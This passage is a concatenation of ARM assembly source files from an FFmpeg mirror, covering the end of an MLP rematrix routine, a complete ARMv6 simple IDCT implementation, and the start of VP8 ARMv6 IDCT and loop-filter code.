function ff_mlp_rematrix_channel_arm, export=1
push {v1-fp,lr}
add v1, sp, #9*4 // point at arguments on stack
ldm v1, {v1-sl}
teq v4, #1
itt ne
teqne v4, #5
teqne v4, #7
bne 99f
teq v6, #64
it ne
teqne v6, #128
bne 99f
sub v2, v2, #MAX_CHANNELS
push {a4,v2,sl} // initialise NOISE,DCH,MASK; make sp dword-aligned
movs INDEX, v3, lsl #7
beq 98f // just in case, do nothing if blockpos = 0
subs INDEX, INDEX, #1<<7 // offset by 1 so we borrow at the right time
adc lr, v1, v1 // calculate index2 (C was set by preceding subs)
orr INDEX, INDEX, lr
// Switch on matrix_noise_shift: values 0 and 1 are
// disproportionately common so do those in a form the branch
// predictor can accelerate. Values can only go up to 15.
cmp v5, #1
beq 11f
blo 10f
A ldr v5, [pc, v5, lsl #2]
A add pc, pc, v5
T tbh [pc, v5, lsl #1]
0:
branch_pic_label 0, 0, (12f - 0b), (13f - 0b)
branch_pic_label (14f - 0b), (15f - 0b), (16f - 0b), (17f - 0b)
branch_pic_label (18f - 0b), (19f - 0b), (20f - 0b), (21f - 0b)
branch_pic_label (22f - 0b), (23f - 0b), (24f - 0b), (25f - 0b)
10: switch_on_au_size 0
11: switch_on_au_size 1
12: switch_on_au_size 2
13: switch_on_au_size 3
14: switch_on_au_size 4
15: switch_on_au_size 5
16: switch_on_au_size 6
17: switch_on_au_size 7
18: switch_on_au_size 8
19: switch_on_au_size 9
20: switch_on_au_size 10
21: switch_on_au_size 11
22: switch_on_au_size 12
23: switch_on_au_size 13
24: switch_on_au_size 14
25: switch_on_au_size 15
98: add sp, sp, #3*4
pop {v1-fp,pc}
99: // Can't handle these parameters, drop back to C
pop {v1-fp,lr}
b X(ff_mlp_rematrix_channel)
endfunc
.unreq PSA
.unreq PCO
.unreq PBL
.unreq INDEX
.unreq CO0
.unreq CO1
.unreq CO2
.unreq CO3
.unreq SA0
.unreq SA1
.unreq SA2
.unreq SA3
.unreq AC0
.unreq AC1
.unreq NOISE
.unreq LSB
.unreq DCH
.unreq MASK
|
Akagi201/ffmpeg-xcode
| 13,292
|
ffmpeg-3.0.2/libavcodec/arm/simple_idct_armv6.S
|
/*
* Simple IDCT
*
* Copyright (c) 2001 Michael Niedermayer <michaelni@gmx.at>
* Copyright (c) 2007 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#define W1 22725 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W2 21407 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W3 19266 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W4 16383 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W5 12873 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W6 8867 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W7 4520 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define ROW_SHIFT 11
#define COL_SHIFT 20
#define W13 (W1 | (W3 << 16))
#define W26 (W2 | (W6 << 16))
#define W42 (W4 | (W2 << 16))
#define W42n (-W4&0xffff | (-W2 << 16))
#define W46 (W4 | (W6 << 16))
#define W57 (W5 | (W7 << 16))
/*
Compute partial IDCT of single row.
shift = left-shift amount
r0 = source address
r2 = row[2,0] <= 2 cycles
r3 = row[3,1]
ip = w42 <= 2 cycles
Output in registers r4--r11
*/
.macro idct_row shift
ldr lr, =W46 /* lr = W4 | (W6 << 16) */
mov r1, #(1<<(\shift-1))
smlad r4, r2, ip, r1
smlsd r7, r2, ip, r1
ldr ip, =W13 /* ip = W1 | (W3 << 16) */
ldr r10,=W57 /* r10 = W5 | (W7 << 16) */
smlad r5, r2, lr, r1
smlsd r6, r2, lr, r1
smuad r8, r3, ip /* r8 = B0 = W1*row[1] + W3*row[3] */
smusdx r11,r3, r10 /* r11 = B3 = W7*row[1] - W5*row[3] */
ldr lr, [r0, #12] /* lr = row[7,5] */
pkhtb r2, ip, r10,asr #16 /* r3 = W7 | (W3 << 16) */
pkhbt r1, ip, r10,lsl #16 /* r1 = W1 | (W5 << 16) */
smusdx r9, r2, r3 /* r9 = -B1 = W7*row[3] - W3*row[1] */
smlad r8, lr, r10,r8 /* B0 += W5*row[5] + W7*row[7] */
smusdx r10,r3, r1 /* r10 = B2 = W5*row[1] - W1*row[3] */
ldr r3, =W42n /* r3 = -W4 | (-W2 << 16) */
smlad r10,lr, r2, r10 /* B2 += W7*row[5] + W3*row[7] */
ldr r2, [r0, #4] /* r2 = row[6,4] */
smlsdx r11,lr, ip, r11 /* B3 += W3*row[5] - W1*row[7] */
ldr ip, =W46 /* ip = W4 | (W6 << 16) */
smlad r9, lr, r1, r9 /* B1 -= W1*row[5] + W5*row[7] */
smlad r5, r2, r3, r5 /* A1 += -W4*row[4] - W2*row[6] */
smlsd r6, r2, r3, r6 /* A2 += -W4*row[4] + W2*row[6] */
smlad r4, r2, ip, r4 /* A0 += W4*row[4] + W6*row[6] */
smlsd r7, r2, ip, r7 /* A3 += W4*row[4] - W6*row[6] */
.endm
/*
Compute partial IDCT of half row.
shift = left-shift amount
r2 = row[2,0]
r3 = row[3,1]
ip = w42
Output in registers r4--r11
*/
.macro idct_row4 shift
ldr lr, =W46 /* lr = W4 | (W6 << 16) */
ldr r10,=W57 /* r10 = W5 | (W7 << 16) */
mov r1, #(1<<(\shift-1))
smlad r4, r2, ip, r1
smlsd r7, r2, ip, r1
ldr ip, =W13 /* ip = W1 | (W3 << 16) */
smlad r5, r2, lr, r1
smlsd r6, r2, lr, r1
smusdx r11,r3, r10 /* r11 = B3 = W7*row[1] - W5*row[3] */
smuad r8, r3, ip /* r8 = B0 = W1*row[1] + W3*row[3] */
pkhtb r2, ip, r10,asr #16 /* r3 = W7 | (W3 << 16) */
pkhbt r1, ip, r10,lsl #16 /* r1 = W1 | (W5 << 16) */
smusdx r9, r2, r3 /* r9 = -B1 = W7*row[3] - W3*row[1] */
smusdx r10,r3, r1 /* r10 = B2 = W5*row[1] - W1*row[3] */
.endm
/*
Compute final part of IDCT single row without shift.
Input in registers r4--r11
Output in registers ip, r4--r6, lr, r8--r10
*/
.macro idct_finish
add ip, r4, r8 /* r1 = A0 + B0 */
sub lr, r4, r8 /* r2 = A0 - B0 */
sub r4, r5, r9 /* r2 = A1 + B1 */
add r8, r5, r9 /* r2 = A1 - B1 */
add r5, r6, r10 /* r1 = A2 + B2 */
sub r9, r6, r10 /* r1 = A2 - B2 */
add r6, r7, r11 /* r2 = A3 + B3 */
sub r10,r7, r11 /* r2 = A3 - B3 */
.endm
/*
Compute final part of IDCT single row.
shift = right-shift amount
Input/output in registers r4--r11
*/
.macro idct_finish_shift shift
add r3, r4, r8 /* r3 = A0 + B0 */
sub r2, r4, r8 /* r2 = A0 - B0 */
mov r4, r3, asr #\shift
mov r8, r2, asr #\shift
sub r3, r5, r9 /* r3 = A1 + B1 */
add r2, r5, r9 /* r2 = A1 - B1 */
mov r5, r3, asr #\shift
mov r9, r2, asr #\shift
add r3, r6, r10 /* r3 = A2 + B2 */
sub r2, r6, r10 /* r2 = A2 - B2 */
mov r6, r3, asr #\shift
mov r10,r2, asr #\shift
add r3, r7, r11 /* r3 = A3 + B3 */
sub r2, r7, r11 /* r2 = A3 - B3 */
mov r7, r3, asr #\shift
mov r11,r2, asr #\shift
.endm
/*
Compute final part of IDCT single row, saturating results at 8 bits.
shift = right-shift amount
Input/output in registers r4--r11
*/
.macro idct_finish_shift_sat shift
add r3, r4, r8 /* r3 = A0 + B0 */
sub ip, r4, r8 /* ip = A0 - B0 */
usat r4, #8, r3, asr #\shift
usat r8, #8, ip, asr #\shift
sub r3, r5, r9 /* r3 = A1 + B1 */
add ip, r5, r9 /* ip = A1 - B1 */
usat r5, #8, r3, asr #\shift
usat r9, #8, ip, asr #\shift
add r3, r6, r10 /* r3 = A2 + B2 */
sub ip, r6, r10 /* ip = A2 - B2 */
usat r6, #8, r3, asr #\shift
usat r10,#8, ip, asr #\shift
add r3, r7, r11 /* r3 = A3 + B3 */
sub ip, r7, r11 /* ip = A3 - B3 */
usat r7, #8, r3, asr #\shift
usat r11,#8, ip, asr #\shift
.endm
/*
Compute IDCT of single row, storing as column.
r0 = source
r1 = dest
*/
function idct_row_armv6
push {lr}
ldr lr, [r0, #12] /* lr = row[7,5] */
ldr ip, [r0, #4] /* ip = row[6,4] */
ldr r3, [r0, #8] /* r3 = row[3,1] */
ldr r2, [r0] /* r2 = row[2,0] */
orrs lr, lr, ip
itt eq
cmpeq lr, r3
cmpeq lr, r2, lsr #16
beq 1f
push {r1}
ldr ip, =W42 /* ip = W4 | (W2 << 16) */
cmp lr, #0
beq 2f
idct_row ROW_SHIFT
b 3f
2: idct_row4 ROW_SHIFT
3: pop {r1}
idct_finish_shift ROW_SHIFT
strh r4, [r1]
strh r5, [r1, #(16*2)]
strh r6, [r1, #(16*4)]
strh r7, [r1, #(16*6)]
strh r11,[r1, #(16*1)]
strh r10,[r1, #(16*3)]
strh r9, [r1, #(16*5)]
strh r8, [r1, #(16*7)]
pop {pc}
1: mov r2, r2, lsl #3
strh r2, [r1]
strh r2, [r1, #(16*2)]
strh r2, [r1, #(16*4)]
strh r2, [r1, #(16*6)]
strh r2, [r1, #(16*1)]
strh r2, [r1, #(16*3)]
strh r2, [r1, #(16*5)]
strh r2, [r1, #(16*7)]
pop {pc}
endfunc
/*
Compute IDCT of single column, read as row.
r0 = source
r1 = dest
*/
function idct_col_armv6
push {r1, lr}
ldr r2, [r0] /* r2 = row[2,0] */
ldr ip, =W42 /* ip = W4 | (W2 << 16) */
ldr r3, [r0, #8] /* r3 = row[3,1] */
idct_row COL_SHIFT
pop {r1}
idct_finish_shift COL_SHIFT
strh r4, [r1]
strh r5, [r1, #(16*1)]
strh r6, [r1, #(16*2)]
strh r7, [r1, #(16*3)]
strh r11,[r1, #(16*4)]
strh r10,[r1, #(16*5)]
strh r9, [r1, #(16*6)]
strh r8, [r1, #(16*7)]
pop {pc}
endfunc
/*
Compute IDCT of single column, read as row, store saturated 8-bit.
r0 = source
r1 = dest
r2 = line size
*/
function idct_col_put_armv6
push {r1, r2, lr}
ldr r2, [r0] /* r2 = row[2,0] */
ldr ip, =W42 /* ip = W4 | (W2 << 16) */
ldr r3, [r0, #8] /* r3 = row[3,1] */
idct_row COL_SHIFT
pop {r1, r2}
idct_finish_shift_sat COL_SHIFT
strb_post r4, r1, r2
strb_post r5, r1, r2
strb_post r6, r1, r2
strb_post r7, r1, r2
strb_post r11,r1, r2
strb_post r10,r1, r2
strb_post r9, r1, r2
strb_post r8, r1, r2
sub r1, r1, r2, lsl #3
pop {pc}
endfunc
/*
Compute IDCT of single column, read as row, add/store saturated 8-bit.
r0 = source
r1 = dest
r2 = line size
*/
function idct_col_add_armv6
push {r1, r2, lr}
ldr r2, [r0] /* r2 = row[2,0] */
ldr ip, =W42 /* ip = W4 | (W2 << 16) */
ldr r3, [r0, #8] /* r3 = row[3,1] */
idct_row COL_SHIFT
pop {r1, r2}
idct_finish
ldrb r3, [r1]
ldrb r7, [r1, r2]
ldrb r11,[r1, r2, lsl #2]
add ip, r3, ip, asr #COL_SHIFT
usat ip, #8, ip
add r4, r7, r4, asr #COL_SHIFT
strb_post ip, r1, r2
ldrb ip, [r1, r2]
usat r4, #8, r4
ldrb r11,[r1, r2, lsl #2]
add r5, ip, r5, asr #COL_SHIFT
usat r5, #8, r5
strb_post r4, r1, r2
ldrb r3, [r1, r2]
ldrb ip, [r1, r2, lsl #2]
strb_post r5, r1, r2
ldrb r7, [r1, r2]
ldrb r4, [r1, r2, lsl #2]
add r6, r3, r6, asr #COL_SHIFT
usat r6, #8, r6
add r10,r7, r10,asr #COL_SHIFT
usat r10,#8, r10
add r9, r11,r9, asr #COL_SHIFT
usat r9, #8, r9
add r8, ip, r8, asr #COL_SHIFT
usat r8, #8, r8
add lr, r4, lr, asr #COL_SHIFT
usat lr, #8, lr
strb_post r6, r1, r2
strb_post r10,r1, r2
strb_post r9, r1, r2
strb_post r8, r1, r2
strb_post lr, r1, r2
sub r1, r1, r2, lsl #3
pop {pc}
endfunc
/*
Compute 8 IDCT row transforms.
func = IDCT row->col function
width = width of columns in bytes
*/
.macro idct_rows func width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
sub r0, r0, #(16*5)
add r1, r1, #\width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
sub r0, r0, #(16*7)
.endm
/* void ff_simple_idct_armv6(int16_t *data); */
function ff_simple_idct_armv6, export=1
push {r4-r11, lr}
sub sp, sp, #128
mov r1, sp
idct_rows idct_row_armv6, 2
mov r1, r0
mov r0, sp
idct_rows idct_col_armv6, 2
add sp, sp, #128
pop {r4-r11, pc}
endfunc
/* ff_simple_idct_add_armv6(uint8_t *dest, int line_size, int16_t *data); */
function ff_simple_idct_add_armv6, export=1
push {r0, r1, r4-r11, lr}
sub sp, sp, #128
mov r0, r2
mov r1, sp
idct_rows idct_row_armv6, 2
mov r0, sp
ldr r1, [sp, #128]
ldr r2, [sp, #(128+4)]
idct_rows idct_col_add_armv6, 1
add sp, sp, #(128+8)
pop {r4-r11, pc}
endfunc
/* ff_simple_idct_put_armv6(uint8_t *dest, int line_size, int16_t *data); */
function ff_simple_idct_put_armv6, export=1
push {r0, r1, r4-r11, lr}
sub sp, sp, #128
mov r0, r2
mov r1, sp
idct_rows idct_row_armv6, 2
mov r0, sp
ldr r1, [sp, #128]
ldr r2, [sp, #(128+4)]
idct_rows idct_col_put_armv6, 1
add sp, sp, #(128+8)
pop {r4-r11, pc}
endfunc
|
Akagi201/ffmpeg-xcode
| 64,315
|
ffmpeg-3.0.2/libavcodec/arm/vp8dsp_armv6.S
|
/*
* VP8 ARMv6 optimisations
*
* Copyright (c) 2010 Google Inc.
* Copyright (c) 2010 Rob Clark <rob@ti.com>
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
* This code was partially ported from libvpx, which uses this license:
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* * Neither the name of Google nor the names of its contributors may
* be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "libavutil/arm/asm.S"
@ idct
@ void vp8_luma_dc_wht(int16_t block[4][4][16], int16_t dc[16])
function ff_vp8_luma_dc_wht_armv6, export=1
push {r4-r10, lr}
ldm r1, {r2-r9}
mov r10, #0
mov lr, #0
uadd16 r12, r2, r8 @ t0[0,1]
usub16 r2, r2, r8 @ t3[0,1]
stm r1!, {r10, lr}
uadd16 r8, r4, r6 @ t1[0,1]
usub16 r4, r4, r6 @ t2[0,1]
stm r1!, {r10, lr}
uadd16 r6, r12, r8 @ dc0[0,1]
usub16 r12, r12, r8 @ dc2[0,1]
stm r1!, {r10, lr}
uadd16 r8, r2, r4 @ dc1[0,1]
usub16 r2, r2, r4 @ dc3[0,1]
stm r1!, {r10, lr}
uadd16 lr, r3, r9 @ t0[2,3]
usub16 r3, r3, r9 @ t3[2,3]
uadd16 r9, r5, r7 @ t1[2,3]
usub16 r5, r5, r7 @ t2[2,3]
uadd16 r7, lr, r9 @ dc0[2,3]
usub16 lr, lr, r9 @ dc2[2,3]
uadd16 r9, r3, r5 @ dc1[2,3]
usub16 r3, r3, r5 @ dc3[2,3]
mov r1, #3
orr r1, r1, #0x30000 @ 3 | 3 (round)
pkhbt r4, r6, r8, lsl #16 @ dc{0,1}[0]
pkhtb r6, r8, r6, asr #16 @ dc{0,1}[1]
pkhbt r5, r12, r2, lsl #16 @ dc{2,3}[0]
pkhtb r12, r2, r12, asr #16 @ dc{2,3}[1]
pkhbt r8, r7, r9, lsl #16 @ dc{0,1}[2]
uadd16 r4, r4, r1
uadd16 r5, r5, r1
pkhtb r7, r9, r7, asr #16 @ dc{0,1}[3]
pkhbt r2, lr, r3, lsl #16 @ dc{2,3}[2]
pkhtb lr, r3, lr, asr #16 @ dc{2,3}[3]
uadd16 r9, r4, r7 @ t0[0,1]
uadd16 r3, r5, lr @ t0[2,3]
usub16 r4, r4, r7 @ t3[0,1]
usub16 r5, r5, lr @ t3[2,3]
uadd16 r7, r6, r8 @ t1[0,1]
uadd16 lr, r12, r2 @ t1[2,3]
usub16 r6, r6, r8 @ t2[0,1]
usub16 r12, r12, r2 @ t2[2,3]
uadd16 r8, r9, r7 @ block[0,1][0]
uadd16 r2, r3, lr @ block[2,3][0]
usub16 r9, r9, r7 @ block[0,1][2]
usub16 r3, r3, lr @ block[2,3][2]
uadd16 r7, r4, r6 @ block[0,1][1]
uadd16 lr, r5, r12 @ block[2,3][1]
usub16 r4, r4, r6 @ block[0,1][3]
usub16 r5, r5, r12 @ block[2,3][3]
#if HAVE_ARMV6T2_EXTERNAL
sbfx r6, r8, #3, #13
sbfx r12, r7, #3, #13
sbfx r1, r9, #3, #13
sbfx r10, r4, #3, #13
#else
sxth r6, r8
sxth r12, r7
sxth r1, r9
sxth r10, r4
asr r6, #3 @ block[0][0]
asr r12, #3 @ block[0][1]
asr r1, #3 @ block[0][2]
asr r10, #3 @ block[0][3]
#endif
strh r6, [r0], #32
asr r8, r8, #19 @ block[1][0]
strh r12, [r0], #32
asr r7, r7, #19 @ block[1][1]
strh r1, [r0], #32
asr r9, r9, #19 @ block[1][2]
strh r10, [r0], #32
asr r4, r4, #19 @ block[1][3]
strh r8, [r0], #32
asr r6, r2, #19 @ block[3][0]
strh r7, [r0], #32
asr r12, lr, #19 @ block[3][1]
strh r9, [r0], #32
asr r1, r3, #19 @ block[3][2]
strh r4, [r0], #32
asr r10, r5, #19 @ block[3][3]
#if HAVE_ARMV6T2_EXTERNAL
sbfx r2, r2, #3, #13
sbfx lr, lr, #3, #13
sbfx r3, r3, #3, #13
sbfx r5, r5, #3, #13
#else
sxth r2, r2
sxth lr, lr
sxth r3, r3
sxth r5, r5
asr r2, #3 @ block[2][0]
asr lr, #3 @ block[2][1]
asr r3, #3 @ block[2][2]
asr r5, #3 @ block[2][3]
#endif
strh r2, [r0], #32
strh lr, [r0], #32
strh r3, [r0], #32
strh r5, [r0], #32
strh r6, [r0], #32
strh r12, [r0], #32
strh r1, [r0], #32
strh r10, [r0], #32
pop {r4-r10, pc}
endfunc
@ void vp8_luma_dc_wht_dc(int16_t block[4][4][16], int16_t dc[16])
function ff_vp8_luma_dc_wht_dc_armv6, export=1
ldrsh r2, [r1]
mov r3, #0
add r2, r2, #3
strh r3, [r1]
asr r2, r2, #3
.rept 16
strh r2, [r0], #32
.endr
bx lr
endfunc
@ void vp8_idct_add(uint8_t *dst, int16_t block[16], int stride)
function ff_vp8_idct_add_armv6, export=1
push {r4-r12, lr}
sub sp, sp, #32
movw r3, #20091 @ cospi8sqrt2minus1
movw r4, #35468 @ sinpi8sqrt2
mov r5, sp
1:
ldr r6, [r1, #8] @ i5 | i4 = block1[1] | block1[0]
ldr lr, [r1, #16] @ i9 | i8 = block2[1] | block2[0]
ldr r12, [r1, #24] @ i13 | i12 = block3[1] | block3[0]
smulwt r9, r3, r6 @ ip[5] * cospi8sqrt2minus1
smulwb r7, r3, r6 @ ip[4] * cospi8sqrt2minus1
smulwt r10, r4, r6 @ ip[5] * sinpi8sqrt2
smulwb r8, r4, r6 @ ip[4] * sinpi8sqrt2
pkhbt r7, r7, r9, lsl #16 @ 5c | 4c
smulwt r11, r3, r12 @ ip[13] * cospi8sqrt2minus1
pkhbt r8, r8, r10, lsl #16 @ 5s | 4s = t2 first half
uadd16 r6, r6, r7 @ 5c+5 | 4c+4 = t3 first half
smulwb r9, r3, r12 @ ip[12] * cospi8sqrt2minus1
smulwt r7, r4, r12 @ ip[13] * sinpi8sqrt2
smulwb r10, r4, r12 @ ip[12] * sinpi8sqrt2
pkhbt r9, r9, r11, lsl #16 @ 13c | 12c
ldr r11, [r1] @ i1 | i0
pkhbt r10, r10, r7, lsl #16 @ 13s | 12s = t3 second half
uadd16 r7, r12, r9 @ 13c+13 | 12c+12 = t2 2nd half
uadd16 r6, r6, r10 @ d = t3
uadd16 r10, r11, lr @ a = t0
usub16 r7, r8, r7 @ c = t2
usub16 r8, r11, lr @ b = t1
uadd16 r9, r10, r6 @ a+d = tmp{0,1}[0]
usub16 r10, r10, r6 @ a-d = tmp{0,1}[3]
uadd16 r6, r8, r7 @ b+c = tmp{0,1}[1]
usub16 r7, r8, r7 @ b-c = tmp{0,1}[2]
mov r8, #0
cmp sp, r5
str r6, [r5, #8] @ o5 | o4
str r7, [r5, #16] @ o9 | o8
str r10, [r5, #24] @ o13 | o12
str r9, [r5], #4 @ o1 | o0
str r8, [r1, #8]
str r8, [r1, #16]
str r8, [r1, #24]
str r8, [r1], #4
beq 1b
mov r5, #2
2:
pop {r1, r6, r12, lr}
smulwt r9, r3, r12 @ ip[5] * cospi8sqrt2minus1
smulwt r7, r3, r1 @ ip[1] * cospi8sqrt2minus1
smulwt r10, r4, r12 @ ip[5] * sinpi8sqrt2
smulwt r8, r4, r1 @ ip[1] * sinpi8sqrt2
pkhbt r11, r1, r12, lsl #16 @ i4 | i0 = t0/t1 first half
pkhtb r1, r12, r1, asr #16 @ i5 | i1
pkhbt r7, r7, r9, lsl #16 @ 5c | 1c
pkhbt r8, r8, r10, lsl #16 @ 5s | 1s = t2 first half
pkhbt r9, r6, lr, lsl #16 @ i6 | i2 = t0/t1 second half
pkhtb r12, lr, r6, asr #16 @ i7 | i3
uadd16 r1, r7, r1 @ 5c+5 | 1c+1 = t3 first half
uadd16 r10, r11, r9 @ a = t0
usub16 r9, r11, r9 @ b = t1
smulwt r7, r3, r12 @ ip[7] * cospi8sqrt2minus1
smulwb lr, r3, r12 @ ip[3] * cospi8sqrt2minus1
smulwt r11, r4, r12 @ ip[7] * sinpi8sqrt2
smulwb r6, r4, r12 @ ip[3] * sinpi8sqrt2
subs r5, r5, #1
pkhbt r7, lr, r7, lsl #16 @ 7c | 3c
pkhbt r11, r6, r11, lsl #16 @ 7s | 3s = t3 second half
mov r6, #0x4
orr r6, r6, #0x40000
uadd16 r12, r7, r12 @ 7c+7 | 3c+3 = t2 second half
uadd16 r10, r10, r6 @ t0 + 4
uadd16 r9, r9, r6 @ t1 + 4
usub16 lr, r8, r12 @ c (o5 | o1) = t2
uadd16 r12, r11, r1 @ d (o7 | o3) = t3
usub16 r1, r9, lr @ b-c = dst{0,1}[2]
uadd16 r7, r10, r12 @ a+d = dst{0,1}[0]
usub16 r12, r10, r12 @ a-d = dst{0,1}[3]
uadd16 r10, r9, lr @ b+c = dst{0,1}[1]
asr lr, r1, #3 @ o[1][2]
asr r9, r12, #3 @ o[1][3]
pkhtb r8, lr, r7, asr #19 @ o[1][0,2]
pkhtb r11, r9, r10, asr #19 @ o[1][1,3]
ldr lr, [r0]
sxth r12, r12
ldr r9, [r0, r2]
sxth r1, r1
#if HAVE_ARMV6T2_EXTERNAL
sbfx r7, r7, #3, #13
sbfx r10, r10, #3, #13
#else
sxth r7, r7
sxth r10, r10
asr r7, #3 @ o[0][0]
asr r10, #3 @ o[0][1]
#endif
pkhbt r7, r7, r1, lsl #13 @ o[0][0,2]
pkhbt r10, r10, r12, lsl #13 @ o[0][1,3]
uxtab16 r7, r7, lr
uxtab16 r10, r10, lr, ror #8
uxtab16 r8, r8, r9
uxtab16 r11, r11, r9, ror #8
usat16 r7, #8, r7
usat16 r10, #8, r10
usat16 r8, #8, r8
usat16 r11, #8, r11
orr r7, r7, r10, lsl #8
orr r8, r8, r11, lsl #8
str r8, [r0, r2]
str_post r7, r0, r2, lsl #1
bne 2b
pop {r4-r12, pc}
endfunc
@ void vp8_idct_dc_add(uint8_t *dst, int16_t block[16], int stride)
function ff_vp8_idct_dc_add_armv6, export=1
push {r4-r6, lr}
add r6, r0, r2, lsl #1
ldrsh r3, [r1]
mov r4, #0
add r3, r3, #4
strh r4, [r1], #32
asr r3, #3
ldr r5, [r0]
ldr r4, [r0, r2]
pkhbt r3, r3, r3, lsl #16
uxtab16 lr, r3, r5 @ a1+2 | a1+0
uxtab16 r5, r3, r5, ror #8 @ a1+3 | a1+1
uxtab16 r12, r3, r4
uxtab16 r4, r3, r4, ror #8
usat16 lr, #8, lr
usat16 r5, #8, r5
usat16 r12, #8, r12
usat16 r4, #8, r4
orr lr, lr, r5, lsl #8
ldr r5, [r6]
orr r12, r12, r4, lsl #8
ldr r4, [r6, r2]
str lr, [r0]
uxtab16 lr, r3, r5
str r12, [r0, r2]
uxtab16 r5, r3, r5, ror #8
uxtab16 r12, r3, r4
uxtab16 r4, r3, r4, ror #8
usat16 lr, #8, lr
usat16 r5, #8, r5
usat16 r12, #8, r12
usat16 r4, #8, r4
orr lr, lr, r5, lsl #8
orr r12, r12, r4, lsl #8
str lr, [r6]
str r12, [r6, r2]
pop {r4-r6, pc}
endfunc
@ void vp8_idct_dc_add4uv(uint8_t *dst, int16_t block[4][16], int stride)
function ff_vp8_idct_dc_add4uv_armv6, export=1
push {r4, lr}
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, #4
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, r2, lsl #2
sub r0, r0, #4
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, #4
bl X(ff_vp8_idct_dc_add_armv6)
pop {r4, pc}
endfunc
@ void vp8_idct_dc_add4y(uint8_t *dst, int16_t block[4][16], int stride)
function ff_vp8_idct_dc_add4y_armv6, export=1
push {r4, lr}
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, #4
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, #4
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, #4
bl X(ff_vp8_idct_dc_add_armv6)
pop {r4, pc}
endfunc
@ loopfilter
.macro transpose o3, o2, o1, o0, i0, i1, i2, i3
uxtb16 \o1, \i1 @ xx 12 xx 10
uxtb16 \o0, \i0 @ xx 02 xx 00
uxtb16 \o3, \i3 @ xx 32 xx 30
uxtb16 \o2, \i2 @ xx 22 xx 20
orr \o1, \o0, \o1, lsl #8 @ 12 02 10 00
orr \o3, \o2, \o3, lsl #8 @ 32 22 30 20
uxtb16 \i1, \i1, ror #8 @ xx 13 xx 11
uxtb16 \i3, \i3, ror #8 @ xx 33 xx 31
uxtb16 \i0, \i0, ror #8 @ xx 03 xx 01
uxtb16 \i2, \i2, ror #8 @ xx 23 xx 21
orr \i0, \i0, \i1, lsl #8 @ 13 03 11 01
orr \i2, \i2, \i3, lsl #8 @ 33 23 31 21
pkhtb \o2, \o3, \o1, asr #16 @ 32 22 12 02
pkhbt \o0, \o1, \o3, lsl #16 @ 30 20 10 00
pkhtb \o3, \i2, \i0, asr #16 @ 33 23 13 03
pkhbt \o1, \i0, \i2, lsl #16 @ 31 21 11 01
.endm
.macro simple_filter
uqsub8 r7, r3, r6 @ p1 - q1
uqsub8 r8, r6, r3 @ q1 - p1
uqsub8 r10, r4, r5 @ p0 - q0
uqsub8 r9, r5, r4 @ q0 - p0
